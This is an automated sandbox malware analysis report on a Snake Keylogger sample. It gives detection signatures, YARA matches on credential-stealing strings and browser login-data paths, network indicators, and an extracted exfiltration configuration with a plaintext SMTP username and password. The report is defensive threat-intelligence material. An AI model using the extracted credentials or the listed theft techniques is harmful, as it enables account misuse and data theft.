
Windows Analysis Report
rp8s2rxD5lpuQAG.exe

Overview

General Information

Sample name:rp8s2rxD5lpuQAG.exe
Analysis ID:1540254
MD5:43299ecabd7a0636e5755414d6b7dc0c
SHA1:488e54f43753706c1ea4e9ba9adffcac501ca086
SHA256:21a47b89b543c1b97adba1999aba18a149cf9e96e00bdabe70f929ba1a8b424e

Detection

Snake Keylogger
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Yara detected Snake Keylogger
.NET source code contains potential unpacker
AI detected suspicious sample
Injects a PE file into a foreign processes
Modifies the context of a thread in another process (thread injection)
Tries to detect the country of the analysis system (by using the IP)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file / registry access)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found inlined nop instructions (likely shell or obfuscated code)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file does not import any functions
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: Suspicious Outbound SMTP Connections
Suricata IDS alerts with low severity for network traffic
Uses SMTP (mail sending)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Uses insecure TLS / SSL version for HTTPS connection
Yara detected Credential Stealer
Yara signature match

Classification

  • System is w10x64
  • rp8s2rxD5lpuQAG.exe (PID: 3688 cmdline: "C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe" MD5: 43299ECABD7A0636E5755414D6B7DC0C)
    • rp8s2rxD5lpuQAG.exe (PID: 4304 cmdline: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe MD5: 43299ECABD7A0636E5755414D6B7DC0C)
  • cleanup
Name: 404 Keylogger, Snake Keylogger
Description: Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victim's sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.
Attribution: No Attribution
Blogpost URLs: none listed
Link: https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger
{"Exfil Mode": "SMTP", "Username": "montesinos@azvconsulting.com", "Password": "FxPtU9s5", "Host": "azvconsulting.com", "Port": "587", "Version": "5.1"}
Source | Rule | Description | Author | Strings
00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
      • 0x14728:$a1: get_encryptedPassword
      • 0x14a14:$a2: get_encryptedUsername
      • 0x14534:$a3: get_timePasswordChanged
      • 0x1462f:$a4: get_passwordField
      • 0x1473e:$a5: set_encryptedPassword
      • 0x15d61:$a7: get_logins
      • 0x15cc4:$a10: KeyLoggerEventArgs
      • 0x15940:$a11: KeyLoggerEventArgsEventHandler
00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp | MALWARE_Win_SnakeKeylogger | Detects Snake Keylogger | ditekSHen
      • 0x17fcc:$x1: $%SMTPDV$
      • 0x18032:$x2: $#TheHashHere%&
      • 0x19695:$x3: %FTPDV$
      • 0x19789:$x4: $%TelegramDv$
      • 0x15940:$x5: KeyLoggerEventArgs
      • 0x15cc4:$x5: KeyLoggerEventArgs
      • 0x196b9:$m2: Clipboard Logs ID
      • 0x198d9:$m2: Screenshot Logs ID
      • 0x199e9:$m2: keystroke Logs ID
      • 0x19cc3:$m3: SnakePW
      • 0x198b1:$m4: \SnakeKeylogger\
00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
Source | Rule | Description | Author | Strings
0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack | JoeSecurity_CredentialStealer | Yara detected Credential Stealer | Joe Security
0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack | JoeSecurity_SnakeKeylogger | Yara detected Snake Keylogger | Joe Security
0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack | Windows_Trojan_SnakeKeylogger_af3faa65 | unknown | unknown
            • 0x12b28:$a1: get_encryptedPassword
            • 0x12e14:$a2: get_encryptedUsername
            • 0x12934:$a3: get_timePasswordChanged
            • 0x12a2f:$a4: get_passwordField
            • 0x12b3e:$a5: set_encryptedPassword
            • 0x14161:$a7: get_logins
            • 0x140c4:$a10: KeyLoggerEventArgs
            • 0x13d40:$a11: KeyLoggerEventArgsEventHandler
0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack | MAL_Envrial_Jan18_1 | Detects Encrial credential stealer malware | Florian Roth
            • 0x1a4bd:$a2: \Comodo\Dragon\User Data\Default\Login Data
            • 0x196ef:$a3: \Google\Chrome\User Data\Default\Login Data
            • 0x19b22:$a4: \Orbitum\User Data\Default\Login Data
            • 0x1ab61:$a5: \Kometa\User Data\Default\Login Data
0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack | INDICATOR_SUSPICIOUS_EXE_DotNetProcHook | Detects executables with potential process hoocking | ditekSHen
            • 0x136c4:$s1: UnHook
            • 0x136cb:$s2: SetHook
            • 0x136d3:$s3: CallNextHook
            • 0x136e0:$s4: _hook

            System Summary

Source: Network Connection | Author: frack113 | Data: DestinationIp: 185.14.58.143, DestinationIsIpv6: false, DestinationPort: 587, EventID: 3, Image: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe, Initiated: true, ProcessId: 4304, Protocol: tcp, SourceIp: 192.168.2.5, SourceIsIpv6: false, SourcePort: 49741
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-23T16:01:36.356933+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49709 | 188.114.97.3 | 443 | TCP
2024-10-23T16:01:42.411660+0200 | 2803305 | 3 | Unknown Traffic | 192.168.2.5 | 49719 | 188.114.97.3 | 443 | TCP

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-10-23T16:01:34.492664+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49706 | 193.122.130.0 | 80 | TCP
2024-10-23T16:01:35.633309+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49706 | 193.122.130.0 | 80 | TCP
2024-10-23T16:01:37.086424+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49710 | 193.122.130.0 | 80 | TCP
2024-10-23T16:01:38.555166+0200 | 2803274 | 2 | Potentially Bad Traffic | 192.168.2.5 | 49713 | 193.122.130.0 | 80 | TCP


            AV Detection

Source: rp8s2rxD5lpuQAG.exe | Avira: detected
Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp | Malware Configuration Extractor: Snake Keylogger {"Exfil Mode": "SMTP", "Username": "montesinos@azvconsulting.com", "Password": "FxPtU9s5", "Host": "azvconsulting.com", "Port": "587", "Version": "5.1"}
Source: rp8s2rxD5lpuQAG.exe | ReversingLabs: Detection: 55%
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 99.9% probability

            Location Tracking

Source: unknown | DNS query: name: reallyfreegeoip.org
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.0
Source: rp8s2rxD5lpuQAG.exe | Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Source: Binary string: laoA.pdb source: rp8s2rxD5lpuQAG.exe
Source: Binary string: laoA.pdbSHA256Bi source: rp8s2rxD5lpuQAG.exe
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then dec eax | 0_2_00007FF848F4388C
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then jmp 00007FF848F3A1EDh | 3_2_00007FF848F39ED2
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then jmp 00007FF848F37FA4h | 3_2_00007FF848F37D92
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then jmp 00007FF848F3A7E0h | 3_2_00007FF848F3A46C
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then jmp 00007FF848F37BE9h | 3_2_00007FF848F37089
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then jmp 00007FF848F38E2Dh | 3_2_00007FF848F38AFE
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then jmp 00007FF848F39CFDh | 3_2_00007FF848F39A08
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then jmp 00007FF848F389E5h | 3_2_00007FF848F3821F
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then jmp 00007FF848F3931Dh | 3_2_00007FF848F3902A
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then jmp 00007FF848F3980Dh | 3_2_00007FF848F394F2
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 4x nop then jmp 00007FF848F3A7E0h | 3_2_00007FF848F3A6FC
Source: global traffic | TCP traffic: 192.168.2.5:49741 -> 185.14.58.143:587
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View | IP Address: 188.114.97.3 188.114.97.3
Source: Joe Sandbox View | IP Address: 193.122.130.0 193.122.130.0
Source: Joe Sandbox View | ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View | ASN Name: S4N-ASES S4N-ASES
Source: Joe Sandbox View | JA3 fingerprint: 54328bd36c14bd82ddaa0c04b25ed9ad
Source: unknown | DNS query: name: checkip.dyndns.org
Source: unknown | DNS query: name: reallyfreegeoip.org
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49713 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49706 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.5:49710 -> 193.122.130.0:80
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49709 -> 188.114.97.3:443
Source: Network traffic | Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.5:49719 -> 188.114.97.3:443
Source: global traffic | TCP traffic: 192.168.2.5:49741 -> 185.14.58.143:587
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: unknown | HTTPS traffic detected: 188.114.97.3:443 -> 192.168.2.5:49707 version: TLS 1.0
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET /xml/173.254.250.90 HTTP/1.1 | Host: reallyfreegeoip.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | HTTP traffic detected: GET / HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR1.0.3705;) | Host: checkip.dyndns.org | Connection: Keep-Alive
Source: global traffic | DNS traffic detected: DNS query: checkip.dyndns.org
Source: global traffic | DNS traffic detected: DNS query: reallyfreegeoip.org
Source: global traffic | DNS traffic detected: DNS query: azvconsulting.com
Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003DAF000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://azvconsulting.com
Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C2D000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C62000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C06000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.com
Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org
Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: http://checkip.dyndns.org/q
Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://reallyfreegeoip.org
Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003A41000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C19000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C2D000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C62000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B9C000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C06000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003C75000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp, rp8s2rxD5lpuQAG.exe, 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003BF2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.90
Source: rp8s2rxD5lpuQAG.exe, 00000003.00000002.4498824475.0000000003B4E000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://reallyfreegeoip.org/xml/173.254.250.90p
Source: unknown | Network traffic detected: HTTP traffic on port 49709 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49721
Source: unknown | Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49721 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49709
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723

            System Summary

Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 3.2.rp8s2rxD5lpuQAG.exe.140000000.0.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Encrial credential stealer malware | Author: Florian Roth
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 0.2.rp8s2rxD5lpuQAG.exe.14219b18.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects executables with potential process hoocking | Author: ditekSHen
Source: 0.2.rp8s2rxD5lpuQAG.exe.141f94d8.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 00000003.00000002.4501421129.0000000140002000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 00000000.00000002.2078403632.00000000142F7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 00000000.00000002.2078403632.000000001418F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: 00000000.00000002.2080607376.000000001CBD0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 3688, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTR | Matched rule: Windows_Trojan_SnakeKeylogger_af3faa65 | Author: unknown
Source: Process Memory Space: rp8s2rxD5lpuQAG.exe PID: 4304, type: MEMORYSTR | Matched rule: Detects Snake Keylogger | Author: ditekSHen
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 0_2_00007FF848F416B8 | 0_2_00007FF848F416B8
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 0_2_00007FF848F4EED7 | 0_2_00007FF848F4EED7
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 0_2_00007FF848F47D9A | 0_2_00007FF848F47D9A
Source: C:\Users\user\Desktop\rp8s2rxD5lpuQAG.exe | Code function: 3_2_00007FF848F37089 | 3_2_00007FF848F37089
Source: rp8s2rxD5lpuQAG.exe | Static PE information: No import functions for PE file found
Source: rp8s2rxD5lpuQAG.exe, 00000000.00000000.2043244059.0000000000A12000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenamelaoA.exeB vs rp8s2rxD5lpuQAG.exe
